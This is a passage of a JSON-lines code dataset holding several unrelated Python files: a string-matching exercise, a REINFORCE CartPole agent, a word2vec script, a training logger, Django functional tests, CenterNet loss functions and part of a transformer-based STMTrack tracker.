magazineDictonary[word]:\n return \"No\"\n return \"Yes\"","repo_name":"dustinrubin/FiLLIP","sub_path":"hashRansom/ransomNoteDustin.py","file_name":"ransomNoteDustin.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19116308705","text":"import copy\nimport pylab\nimport numpy as np\nimport sys\nif \"../\" not in sys.path:\n sys.path.append(\"../\") \nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\nfrom keras import backend as K\nimport gym\n\n# 그리드월드 예제에서의 REINFORCE 에이전트\nclass ReinforceAgent:\n def __init__(self):\n # 가능한 모든 행동 정의\n self.action_space = [0, 1]\n # 상태와 행동의 크기 정의\n self.action_size = len(self.action_space)\n self.state_size = 4\n self.discount_factor = 0.99 \n self.learning_rate = 0.001\n\n self.model = self.build_model()\n self.optimizer = self.optimizer()\n self.states, self.actions, self.rewards = [], [], []\n\n \n \n # 상태가 입력, 각 행동의 확률이 출력인 인공신경망 생성\n def build_model(self):\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(self.action_size, activation='softmax'))\n return model\n \n # 정책신경망을 업데이트 하기 위한 오류함수와 훈련함수의 생성\n def optimizer(self):\n action = K.placeholder(shape=[None, 2])\n discounted_rewards = K.placeholder(shape=[None, ])\n \n # 크로스 엔트로피 오류함수 계산\n action_prob = K.sum(action * self.model.output, axis=1)\n cross_entropy = K.log(action_prob) * discounted_rewards\n loss = -K.sum(cross_entropy)\n \n # 정책신경망을 업데이트하는 훈련함수 생성\n optimizer = Adam(lr=self.learning_rate)\n updates = optimizer.get_updates(self.model.trainable_weights, [], loss)\n train = K.function([self.model.input, action, discounted_rewards], [],\n updates=updates)\n\n return train\n\n # 정책신경망으로 행동 선택\n def get_action(self, state):\n policy = self.model.predict(state)[0]\n return np.random.choice(self.action_size, 1, p=policy)[0]\n \n # 반환값 계산\n def discount_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n running_add = 0\n for t in reversed(range(0, len(rewards))):\n running_add = running_add * self.discount_factor + rewards[t]\n discounted_rewards[t] = running_add\n return discounted_rewards\n \n # 한 에피소드 동안의 상태, 행동, 보상을 저장\n def append_sample(self, state, action, reward):\n self.states.append(state[0])\n self.rewards.append(reward)\n act = np.zeros(self.action_size)\n act[action] = 1\n self.actions.append(act)\n\n # 정책신경망 업데이트\n def train_model(self):\n discounted_rewards = np.float32(self.discount_rewards(self.rewards))\n discounted_rewards -= np.mean(discounted_rewards)\n discounted_rewards /= np.std(discounted_rewards)\n \n states = np.array(self.states)\n actions = np.array(self.actions)\n self.optimizer([states, actions, discounted_rewards])\n self.states, self.actions, self.rewards = [], [], []\n\nEPISODES = 800\n\nif __name__==\"__main__\":\n env = gym.make('CartPole-v1')\n agent = ReinforceAgent()\n \n global_step = 0\n scores, episodes = [], []\n \n for e in range(EPISODES):\n done = False\n score = 0\n state = env.reset()\n state = np.reshape(state, [1,4])\n \n while not done:\n env.render()\n global_step += 1\n \n action = agent.get_action(state)\n next_state, reward, done, _ = env.step(action)\n next_state = np.reshape(next_state, [1,4])\n reward = reward if not done or score == 499 else -100\n agent.append_sample(state, action, reward)\n \n score += reward\n state = copy.deepcopy(next_state)\n \n if done:\n agent.train_model()\n score = score if score == 500.0 else score + 100\n scores.append(score)\n episodes.append(e)\n score = round(score, 2)\n print(\"episode: \", e, \" score: \", score, \" time_step: \", global_step)\n \n # 최근 10번의 에피소드의 평균점수가 490이 넘으면 종료\n if np.mean(scores[-min(10, len(scores)):]) > 490:\n sys.exit()","repo_name":"hyunhakim/RL-base-study","sub_path":"PolicyGradient/REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42032668871","text":"\"\"\"\n\n\"\"\"\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nimport os\n\nimport walks as serialized_walk\nfrom gensim.models import Word2Vec\nimport Skipgram as skg\n\n\n# if not args.vertex_freq_degree:\n# vertex_counts = serialized_walk.count_textfiles(walk_files, args.workers)\n# else:\n# vertex_counts = G.degree(nodes=G.keys())\n# logger.info(\"Training...\")\n# # 生成语料库\n# walks_corpus = serialized_walk.WalksCorpus(walk_files)\n# model = Skipgram(sentences=walks_corpus, vocabulary_counts=vertex_counts, size=args.representation_size,\n# window=args.window_size, min_count=0, trim_rule=None, workers=args.workers)\n# model.wv.save_word2vec_format(args.output)\n\ndef main():\n parse = ArgumentParser(description=\"word2vec parser\", formatter_class=ArgumentDefaultsHelpFormatter,\n conflict_handler='resolve')\n parse.add_argument('--representation-size', type=int, default=100, help=\"向量维度\")\n parse.add_argument(\"--window\", type=int, default=10, help=\"窗口值\")\n parse.add_argument(\"--min-count\", type=int, default=0, help=\"最小的总量\")\n parse.add_argument(\"--workers\", type=int, default=4, help=\"电脑核数\")\n\n args = parse.parse_args()\n process(args)\n\n\ndef process(args):\n basePath = \"D:\\workspace\\pproject\\deepwalk\\example\\\\textoot1\"\n files = []\n for i in range(0, 8):\n files.append(os.path.join(basePath, str(i)))\n\n vertex_count = serialized_walk.count_textfiles(files, 4)\n corpus = serialized_walk.combine_files_iter(files, 4)\n model = skg.Skipgram(sentences=corpus, vocabulary_counts=vertex_count, size=args.representation_size,\n window=args.window_size, min_count=0, trim_rule=None, workers=args.workers)\n model.wv.save_word2vec_format(os.path.join(basePath, \".emb\"))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Sparkoor/learning","sub_path":"deepwalk/Word2VecMain.py","file_name":"Word2VecMain.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11387489476","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\n\"\"\"\nCreated on Fri Feb 17 12:38:44 2017\n@author: ahefny, zmarinho\n\"\"\"\nimport numpy as np\n\nimport rpsp.globalconfig as globalconfig\nfrom rpsp.run.test_utils.plot import call_plot, save_model\n\nclass Log(object):\n def __init__(self, args, filename, n=3, pred_model=None):\n self._pp = call_plot(name=filename, n=n, trial=args.trial)\n self._pred_model = pred_model\n self._args = args\n self._irate = args.irate\n self._last_err = np.inf\n self.avg_traj = []\n self._results = {'act': [], 'rewards': [], 'rwd': [], 'obs': [],\n 'mse': [], 'exp': filename, 'rng': [], 'env_states': []}\n self.msg=[]\n\n def log(self, msg):\n if globalconfig.vars.args.verbose:\n self.msg.extend(' '.join(msg))\n\n\n def logger(self, i, trajs, res, track_delta=False):\n # Output stats\n C = [np.sum(t.rewards) for t in trajs]\n m = np.mean(C)\n s = np.std(C)\n wdecay = 1.0 if self._args.wdecay is None else self._args.wdecay\n wpred = self._args.grad_step if self._args.wpred is None else self._args.wpred\n rwd_coeff = self._args.wrwd if self._args.wrwd > 0.0 else self._args.wrwd_only\n wrwd = self._args.trpo_step if rwd_coeff is None else rwd_coeff\n res['best_vel_avg'] = np.mean(trajs[trajs[-1].bib].vel)\n res['best_vel_min'] = np.min(trajs[trajs[-1].bib].vel)\n res['best_vel_max'] = np.max(trajs[trajs[-1].bib].vel)\n res['best_rwd'] = np.sum(trajs[trajs[-1].bib].rewards)\n if self._pred_model is None:\n if (i % self._irate == 0):\n # self._pp.plot_single(m,s)\n self._pp.plot_traj(trajs[0], trajs[0].obs)\n self._pp.plot(np.mean(res.get('cost1_avg', 0.)), np.std(res.get('cost1_avg', 0.)),\n np.mean(res.get('fvel_avg', 0.0)), np.std(res.get('fvel_avg', 0.0)),\n m, s, False, label_2='vel')\n else:\n normalizer = float(wpred * wdecay ** i) if wpred > 0.0 else wdecay ** i\n emse = (res.get('total_cost', 0.) - wrwd * res.get('reinf_cost_avg', 0.)) / normalizer\n R = [emse]\n self._results['mse'].append(R)\n if track_delta:\n ##track difference between avg trajectory for exploration evaluation\n avg = np.zeros((self._args.numtrajs, self._args.len, trajs[0].obs.shape[1]))\n for k, t in enumerate(trajs):\n avg[k, :t.obs.shape[0], :] = t.obs / float(t.obs.shape[0])\n self.avg_traj.append(np.sum(avg, axis=0))\n self.log('\\t\\tdelta_batch_avg:{} delta_prev_avg:{}'.format(\n np.linalg.norm(np.mean([(t.obs - self.avg_traj[-1][:t.obs.shape[0]]) ** 2], axis=0)),\n np.linalg.norm(np.mean([(t.obs - 0.0\n if len(self.avg_traj) < 2\n else self.avg_traj[-2][:t.obs.shape[0]]) ** 2], axis=0)),\n ))\n self._last_err = np.mean(np.copy(R))\n if (i % self._irate == 0):\n try:\n reinf = res.get('trpo_cost', 0.)\n except KeyError:\n reinf = res.get('cost2_avg', 0.)\n self._pp.plot(np.mean(res.get('cost1_avg', 0.)), np.std(res.get('cost1_avg', 0.)),\n np.mean(res.get('fvel_avg', 0.0)), np.std(res.get('fvel_avg', 0.0)),\n m, s, False, label_2='vel')\n tpred = self._pred_model.traj_predict_1s(trajs[0].states, trajs[0].act)\n self._pp.plot_traj(trajs[0], tpred)\n\n self.log('reg:{} psr_step:{} rwd_w:{} past:{} fut:{}'.format(self._args.reg, self._args.grad_step, self._args.wrwd,\n self._args.past, self._args.fut))\n self.log('\\t\\t\\t\\t\\t\\t' + '\\t\\t\\t\\t\\t\\t'.join(['{}={}\\n'.format(k, res.get(k, 0.0)) for k in res.keys()]))\n self._results['rewards'].append([np.sum(t.rewards) for t in trajs])\n\n if (i % 50 == 0):\n self._results['env_states'].append([trajs[trajs[-1].bib].env_states])\n self._results['rwd'].append([trajs[trajs[-1].bib].rewards])\n self._results['act'].append([trajs[trajs[-1].bib].act])\n self._results['rng'].append([trajs[trajs[-1].bib].rng])\n self._results['obs'].append([trajs[trajs[-1].bib].obs])\n if (i % (self._args.prate) == 0):\n # save pickle results\n save_model(self._args.method + '_trial%d' % self._args.trial, self._args.flname, self._results, self._args)\n return False","repo_name":"ahefnycmu/rpsp","sub_path":"rpsp/run/test_utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"2792468725","text":"#from django.test import LiveServerTestCase\nfrom unittest import skip\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n#import unittest\n\nclass ToDoFunctionalTest(StaticLiveServerTestCase):\n # before every test, set up\n def setUp(self):\n self.browser = webdriver.Firefox()\n # if anything every go wrong, after 3s, go ahead and fail right away\n self.browser.implicitly_wait(3)\n # after every test, shut down\n def tearDown(self):\n self.browser.quit()\n\n def find_table_row(self, item_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n for row in rows:\n row_text = row.find_elements_by_tag_name('td')[2].text\n if item_text == row_text:\n return row\n self.fail('\"%s\" not in table - \"%s\"' % (item_text, table.text))\n\n def check_for_row_in_list_table(self, row_text):\n row = self.find_table_row(row_text)\n self.assertIsNotNone(row)\n\n # self.assertIn(row_text + ' Delete', [row.text for row in rows])\n\n def enter_a_new_item(self, todo_text):\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys(todo_text)\n inputbox.send_keys(Keys.ENTER)\n","repo_name":"Jeanielmj/ottg_tdd","sub_path":"superlists/functional_tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7278369214","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nfrom .utils import _tranpose_and_gather_feat, _tranpose_and_gather_feat_gridneighbor\nimport torch.nn.functional as F\nfrom .utils import gaussian_fit\n\n\ndef _slow_neg_loss(pred, gt):\n '''focal loss from CornerNet'''\n pos_inds = gt.eq(1)\n neg_inds = gt.lt(1)\n\n neg_weights = torch.pow(1 - gt[neg_inds], 4)\n\n loss = 0\n pos_pred = pred[pos_inds]\n neg_pred = pred[neg_inds]\n\n pos_loss = torch.log(pos_pred) * torch.pow(1 - pos_pred, 2)\n neg_loss = torch.log(1 - neg_pred) * torch.pow(neg_pred, 2) * neg_weights\n\n num_pos = pos_inds.float().sum()\n pos_loss = pos_loss.sum()\n neg_loss = neg_loss.sum()\n\n if pos_pred.nelement() == 0:\n loss = loss - neg_loss\n else:\n loss = loss - (pos_loss + neg_loss) / num_pos\n return loss\n\n\ndef _neg_loss(pred, gt):\n ''' Modified focal loss. Exactly the same as CornerNet.\n Runs faster and costs a little bit more memory\n Arguments:\n pred (batch x c x h x w)\n gt_regr (batch x c x h x w)\n '''\n pos_inds = gt.eq(1).float()\n neg_inds = gt.lt(1).float()\n\n neg_weights = torch.pow(1 - gt, 4)\n\n loss = 0\n\n pos_loss = torch.log(pred) * torch.pow(1 - pred, 2) * pos_inds\n neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds\n\n num_pos = pos_inds.float().sum()\n pos_loss = pos_loss.sum()\n neg_loss = neg_loss.sum()\n\n if num_pos == 0:\n loss = loss - neg_loss\n else:\n loss = loss - (pos_loss + neg_loss) / num_pos\n return loss\n\n\ndef _not_faster_neg_loss(pred, gt):\n pos_inds = gt.eq(1).float()\n neg_inds = gt.lt(1).float()\n num_pos = pos_inds.float().sum()\n neg_weights = torch.pow(1 - gt, 4)\n\n loss = 0\n trans_pred = pred * neg_inds + (1 - pred) * pos_inds\n weight = neg_weights * neg_inds + pos_inds\n all_loss = torch.log(1 - trans_pred) * torch.pow(trans_pred, 2) * weight\n all_loss = all_loss.sum()\n\n if num_pos > 0:\n all_loss /= num_pos\n loss -= all_loss\n return loss\n\n\ndef _slow_reg_loss(regr, gt_regr, mask):\n num = mask.float().sum()\n mask = mask.unsqueeze(2).expand_as(gt_regr)\n\n regr = regr[mask]\n gt_regr = gt_regr[mask]\n\n regr_loss = nn.functional.smooth_l1_loss(regr, gt_regr, size_average=False)\n regr_loss = regr_loss / (num + 1e-4)\n return regr_loss\n\n\ndef _reg_loss(regr, gt_regr, mask):\n ''' L1 regression loss\n Arguments:\n regr (batch x max_objects x dim)\n gt_regr (batch x max_objects x dim)\n mask (batch x max_objects)\n '''\n num = mask.float().sum()\n mask = mask.unsqueeze(2).expand_as(gt_regr).float()\n\n regr = regr * mask\n gt_regr = gt_regr * mask\n\n regr_loss = nn.functional.smooth_l1_loss(regr, gt_regr, size_average=False)\n regr_loss = regr_loss / (num + 1e-4)\n return regr_loss\n\n\ndef multi_gaussian_Kl_divergence(outsigmaW, outsigmaH, outmuW, outmuH, sigmaW_gt, sigmaH_gt):\n kl_divergience = [0.5 * torch.log((sigmaW_gt[i] ** 2 * sigmaH_gt[i] ** 2) / (outsigmaW[i] * outsigmaH[i])) - 1\n + 0.5 * ((outsigmaW[i] / sigmaW_gt[i] ** 2) + (outsigmaH[i] / sigmaH_gt[i] ** 2)) +\n 0.5 * ((outmuW[i] ** 2 / sigmaW_gt[i] ** 2) + (outmuH[i] ** 2 / sigmaH_gt[i] ** 2))\n for i in range(len(outsigmaW))]\n return sum(kl_divergience)\n\n\nclass FocalLoss(nn.Module):\n '''nn.Module warpper for focal loss'''\n\n def __init__(self):\n super(FocalLoss, self).__init__()\n self.neg_loss = _neg_loss\n\n def forward(self, out, target):\n return self.neg_loss(out, target)\n\n\nclass Focalloss_exphm_and_sigma_KL_divergence(nn.Module):\n def __init__(self):\n super(Focalloss_exphm_and_sigma_KL_divergence, self).__init__()\n self.neg_loss = _neg_loss\n\n def forward(self, hm_out, hm_gt, ct_ind, sigma_wh, hm_mask, sigmawh_mask):\n \"\"\"\n hm_gt : batch * clsnum * output_size * output_size\n hm_out : batch * clsnum * output_size * output_size\n ct_ind : batch * clsnum * maxobjsnum * 2\n sigma_wh : batch * clsnum * maxobjs * 2\n regmask: batch * maxobjs * 2\n hm_mask : batch * clsnum * output_size * output_size\n sigmawh_mask: batch * clsnum * maxobjs\n \"\"\"\n #focal_loss_norm = self.neg_loss(torch.clamp((hm_out * hm_mask).sigmoid_(), min=1e-4, max=1 - 1e-4), hm_gt * hm_mask )\n focal_loss_norm = self.neg_loss(torch.clamp((hm_out * hm_mask), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n #focal_loss_norm = torch.nn.MSELoss()(torch.clamp((hm_out * hm_mask), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n #focal_loss_norm = self.neg_loss(torch.clamp((hm_out* hm_mask).sigmoid_(), min=1e-4, max=1 - 1e-4),hm_gt * hm_mask)\n focal_loss_norm = self.neg_loss(torch.clamp((hm_out).sigmoid_(), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n #import pdb\n #db.set_trace()\n batch_channel_sigma_w_list = []\n batch_channel_sigma_h_list = []\n batch_channel_mu_w_list = []\n batch_channel_mu_h_list = []\n gt_channel_sigma_w_list = []\n gt_channel_sigma_h_list = []\n\n for batch in range(hm_out.size(0)):\n for cls in range(hm_out.size(1)):\n if int(sigmawh_mask[batch][cls].sum()) > 0:\n for obj in range(int(sigmawh_mask[batch][cls].sum())):\n if int(sigmawh_mask[batch][cls][obj]) == 1:\n x, y = int(ct_ind[batch][cls][obj][0]), int(ct_ind[batch][cls][obj][1])\n sigma_w, sigma_h = sigma_wh[batch][cls][obj]\n radius_w, radius_h = int((sigma_w * 6 - 1) / 2), int((sigma_h * 6 - 1) / 2)\n height, width = hm_out.shape[2:]\n left, right = int(min(x, radius_w)), int(min(width - x, radius_w + 1))\n top, bottom = int(min(y, radius_h)), int(min(height - y, radius_h + 1))\n\n peer_objs_hm_pdfvalue = hm_out.clone()[batch][cls][y - top:y + bottom,\n x - left:x + right].contiguous().view(-1)\n ys, xs = torch.meshgrid((torch.arange(-1 * radius_h, radius_h + 1, 1),\n torch.arange(-1 * radius_w, radius_w + 1, 1)))\n xs = xs.reshape(-1).type_as(peer_objs_hm_pdfvalue).cuda()\n ys = ys.reshape(-1).type_as(peer_objs_hm_pdfvalue).cuda()\n out_sigmaw, out_sigmah, out_muw, out_muh = gaussian_fit(xs, ys, peer_objs_hm_pdfvalue)\n\n if out_sigmaw >0 and out_sigmah >0:\n batch_channel_sigma_w_list.append(out_sigmaw)\n batch_channel_sigma_h_list.append(out_sigmah)\n batch_channel_mu_w_list.append(out_muw)\n batch_channel_mu_h_list.append(out_muh)\n gt_channel_sigma_w_list.append(sigma_w)\n gt_channel_sigma_h_list.append(sigma_h)\n if len(batch_channel_sigma_w_list) != 0:\n Kl_divergence = multi_gaussian_Kl_divergence(batch_channel_sigma_w_list, batch_channel_sigma_h_list,\n batch_channel_mu_w_list, batch_channel_mu_h_list,\n gt_channel_sigma_w_list, gt_channel_sigma_h_list)\n\n return Kl_divergence , focal_loss_norm\n else:\n return None, focal_loss_norm\n\n\nclass RegLoss(nn.Module):\n '''Regression loss for an output tensor\n Arguments:\n output (batch x dim x h x w)\n mask (batch x max_objects)\n ind (batch x max_objects)\n target (batch x max_objects x dim)\n '''\n\n def __init__(self):\n super(RegLoss, self).__init__()\n\n def forward(self, output, mask, ind, target):\n pred = _tranpose_and_gather_feat(output, ind)\n loss = _reg_loss(pred, target, mask)\n return loss\n\n\nclass RegL1Loss(nn.Module):\n def __init__(self):\n super(RegL1Loss, self).__init__()\n\n def forward(self, output, mask, ind, target):\n pred = _tranpose_and_gather_feat(output, ind)\n mask = mask.unsqueeze(2).expand_as(pred).float()\n # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n loss = loss / (mask.sum() + 1e-4)\n return loss\n\n\nclass RegL1loss_gridneighbor(nn.Module):\n def __init__(self):\n super(RegL1loss_gridneighbor, self).__init__()\n\n def forward(self, output, mask, ind, target, mainpoints_list):\n ##pred: Batch x max_objs x mainpoinsnum*2\n ##output: Batch x mainpoinsnum*2 x w x h\n ##ind: Batch x max_objs x mainpoinsnum\n ##target: Batch x max_objs x 2\n\n pred = _tranpose_and_gather_feat_gridneighbor(output, ind)\n mask = mask.unsqueeze(3).expand(mask.size(0), mask.size(1), mask.size(2),\n pred.size(2) // mask.size(2)).contiguous().view(mask.size(0), mask.size(1),\n -1).float()\n # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n loss = 0\n for point in range(len(mainpoints_list)):\n loss += F.l1_loss(pred[:, :, point:point + 2] * mask[:, :, point:point + 2],\n target[:, :, point:point + 2] * mask[:, :, point:point + 2], size_average=False)\n loss = loss / (mask.sum() + 1e-4)\n return loss\n\n\nclass NormRegL1Loss(nn.Module):\n def __init__(self):\n super(NormRegL1Loss, self).__init__()\n\n def forward(self, output, mask, ind, target):\n pred = _tranpose_and_gather_feat(output, ind)\n mask = mask.unsqueeze(2).expand_as(pred).float()\n # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n pred = pred / (target + 1e-4)\n target = target * 0 + 1\n loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n loss = loss / (mask.sum() + 1e-4)\n return loss\n\n\nclass RegWeightedL1Loss(nn.Module):\n def __init__(self):\n super(RegWeightedL1Loss, self).__init__()\n\n def forward(self, output, mask, ind, target):\n pred = _tranpose_and_gather_feat(output, ind)\n mask = mask.float()\n # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n loss = loss / (mask.sum() + 1e-4)\n return loss\n\n\nclass L1Loss(nn.Module):\n def __init__(self):\n super(L1Loss, self).__init__()\n\n def forward(self, output, mask, ind, target):\n pred = _tranpose_and_gather_feat(output, ind)\n mask = mask.unsqueeze(2).expand_as(pred).float()\n loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n return loss\n\n\nclass BinRotLoss(nn.Module):\n def __init__(self):\n super(BinRotLoss, self).__init__()\n\n def forward(self, output, mask, ind, rotbin, rotres):\n pred = _tranpose_and_gather_feat(output, ind)\n loss = compute_rot_loss(pred, rotbin, rotres, mask)\n return loss\n\n\ndef compute_res_loss(output, target):\n return F.smooth_l1_loss(output, target, reduction='elementwise_mean')\n\n\n# TODO: weight\ndef compute_bin_loss(output, target, mask):\n mask = mask.expand_as(output)\n output = output * mask.float()\n return F.cross_entropy(output, target, reduction='elementwise_mean')\n\n\ndef compute_rot_loss(output, target_bin, target_res, mask):\n # output: (B, 128, 8) [bin1_cls[0], bin1_cls[1], bin1_sin, bin1_cos, \n # bin2_cls[0], bin2_cls[1], bin2_sin, bin2_cos]\n # target_bin: (B, 128, 2) [bin1_cls, bin2_cls]\n # target_res: (B, 128, 2) [bin1_res, bin2_res]\n # mask: (B, 128, 1)\n # import pdb; pdb.set_trace()\n output = output.view(-1, 8)\n target_bin = target_bin.view(-1, 2)\n target_res = target_res.view(-1, 2)\n mask = mask.view(-1, 1)\n loss_bin1 = compute_bin_loss(output[:, 0:2], target_bin[:, 0], mask)\n loss_bin2 = compute_bin_loss(output[:, 4:6], target_bin[:, 1], mask)\n loss_res = torch.zeros_like(loss_bin1)\n if target_bin[:, 0].nonzero().shape[0] > 0:\n idx1 = target_bin[:, 0].nonzero()[:, 0]\n valid_output1 = torch.index_select(output, 0, idx1.long())\n valid_target_res1 = torch.index_select(target_res, 0, idx1.long())\n loss_sin1 = compute_res_loss(\n valid_output1[:, 2], torch.sin(valid_target_res1[:, 0]))\n loss_cos1 = compute_res_loss(\n valid_output1[:, 3], torch.cos(valid_target_res1[:, 0]))\n loss_res += loss_sin1 + loss_cos1\n if target_bin[:, 1].nonzero().shape[0] > 0:\n idx2 = target_bin[:, 1].nonzero()[:, 0]\n valid_output2 = torch.index_select(output, 0, idx2.long())\n valid_target_res2 = torch.index_select(target_res, 0, idx2.long())\n loss_sin2 = compute_res_loss(\n valid_output2[:, 6], torch.sin(valid_target_res2[:, 1]))\n loss_cos2 = compute_res_loss(\n valid_output2[:, 7], torch.cos(valid_target_res2[:, 1]))\n loss_res += loss_sin2 + loss_cos2\n return loss_bin1 + loss_bin2 + loss_res\n","repo_name":"Wastoon/CenterNet-Multi-Func-Det","sub_path":"src/lib/models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":13562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20892806074","text":"# -*- coding: utf-8 -*\n\nfrom loguru import logger\n\nimport torch\nimport torch.nn.functional as F\nfrom videoanalyst.model.common_opr.common_block import (conv_bn_relu,\n xcorr_depthwise)\nfrom videoanalyst.model.aia_transformer.transformer_impl.position_encoding import PositionEmbeddingSine\nfrom videoanalyst.model.aia_transformer.transformer_impl.transformer import (TransformerEncoderLayer,\n TransformerEncoder) \nfrom videoanalyst.model.module_base import ModuleBase\nfrom videoanalyst.model.task_model.taskmodel_base import (TRACK_TASKMODELS,\n VOS_TASKMODELS)\n\ntorch.set_printoptions(precision=8)\n\n\n@TRACK_TASKMODELS.register\n@VOS_TASKMODELS.register\nclass STMTrack(ModuleBase):\n\n default_hyper_params = dict(pretrain_model_path=\"\",\n head_width=256,\n conv_weight_std=0.01,\n corr_fea_output=False,\n amp=False)\n\n support_phases = [\"train\", \"memorize\", \"track\"]\n\n def __init__(self, backbone_m, backbone_q, neck_m, neck_q, head, loss=None):\n super(STMTrack, self).__init__()\n self.basemodel_m = backbone_m\n self.basemodel_q = backbone_q\n self.neck_m = neck_m\n self.neck_q = neck_q\n self.head = head\n self.loss = loss\n HIDDEN_DIM =256\n N_steps=HIDDEN_DIM // 2\n self.p_e=PositionEmbeddingSine(N_steps, normalize=True)\n MATCH_DIM=64\n self.i_e=PositionEmbeddingSine(MATCH_DIM // 2, normalize=True)\n\n \n encoder_layer = TransformerEncoderLayer(HIDDEN_DIM, \n nhead=4, \n dim_feedforward=1024,\n dropout=0.1, \n activation='relu', \n normalize_before=False,\n divide_norm=False, \n use_AiA=True,\n match_dim=MATCH_DIM, \n feat_size=400)\n encoder_norm = None\n self.encoder = TransformerEncoder(encoder_layer, \n num_layers=2, \n norm=encoder_norm)\n \n\n\n\n\n self._phase = \"train\"\n\n @property\n def phase(self):\n return self._phase\n\n @phase.setter\n def phase(self, p):\n assert p in self.support_phases\n self._phase = p\n\n def memorize(self, im_crop,im_mask, fg_bg_label_map):\n fm = self.basemodel_m(im_crop, fg_bg_label_map)\n fm = self.neck_m(fm)\n\n\n fm_mask = F.interpolate(im_mask, size=fm.shape[-2:]).to(torch.bool)\n b,t,h,w=fm_mask.size()\n fm_mask=fm_mask.view(b*t,h,w)\n\n\n fm_pos=self.p_e(fm,fm_mask)\n fm_inr=self.i_e(fm,fm_mask)\n\n\n\n b,c,w,h=fm.size()\n fm=(fm).view(b,c,-1).permute(2, 0, 1).contiguous()\n fm_mask=fm_mask.permute(1,2,0).view(-1,b).contiguous()\n # print(\"fm_pos : \",fm_pos.shape)\n # print(\"b,c,-1 : \",b,c,-1)\n fm_pos=(fm_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n\n # input()\n _,c1,_,_=fm_inr.size()\n fm_inr=fm_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n\n fm=self.encoder(fm, src_key_padding_mask=fm_mask, pos=fm_pos, inr=fm_inr)\n\n fm=fm.permute(1,2,0).view(b,c,w,h)\n fm = fm.permute(1, 0, 2, 3).unsqueeze(0).contiguous() # B, C, T, H, W\n\n\n\n return fm\n\n def train_forward(self, training_data):\n memory_img = training_data[\"im_m\"]\n mask_m=training_data[\"mask_m\"]\n query_img = training_data[\"im_q\"]\n mask_q=training_data[\"mask_q\"]\n\n\n #backbone feature\n assert len(memory_img.shape) == 5\n B, T, C, H, W = memory_img.shape\n\n memory_img = memory_img.view(-1, C, H, W) # no memory copy\n target_fg_bg_label_map = training_data[\"fg_bg_label_map\"].view(-1, 1, H, W)\n\n fm = self.basemodel_m(memory_img, target_fg_bg_label_map)\n fm = self.neck_m(fm) # B * T, C, H, W\n\n fm_mask = F.interpolate(mask_m, size=fm.shape[-2:]).to(torch.bool)\n b,t,h,w=fm_mask.size()\n fm_mask=fm_mask.view(b*t,h,w)\n fm_pos=self.p_e(fm,fm_mask)\n fm_inr=self.i_e(fm,fm_mask)\n\n\n\n\n\n b,c,w,h=fm.size()\n fm=(fm).view(b,c,-1).permute(2, 0, 1).contiguous()\n fm_mask=fm_mask.permute(1,2,0).view(-1,b).contiguous()\n fm_pos=(fm_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fm_inr.size()\n fm_inr=fm_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fm=self.encoder(fm, src_key_padding_mask=fm_mask, pos=fm_pos, inr=fm_inr)\n fm=fm.permute(1,2,0).view(b,c,w,h)\n fm = fm.view(B, T, *fm.shape[-3:]).contiguous() # B, T, C, H, W\n fm = fm.permute(0, 2, 1, 3, 4).contiguous() # B, C, T, H, W\n\n\n\n\n\n fq = self.basemodel_q(query_img)\n fq = self.neck_q(fq)\n fq_mask = F.interpolate(mask_q, size=fq.shape[-2:]).to(torch.bool)\n b,t,h,w=fq_mask.size()\n fq_mask=fq_mask.view(b*t,h,w)\n fq_pos=self.p_e(fq,fq_mask)\n fq_inr=self.i_e(fq,fq_mask)\n\n\n b,c,w,h=fq.size()\n fq=(fq).view(b,c,-1).permute(2, 0, 1).contiguous()\n fq_mask=fq_mask.permute(1,2,0).view(-1,b).contiguous()\n\n\n fq_pos=(fq_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fq_inr.size()\n 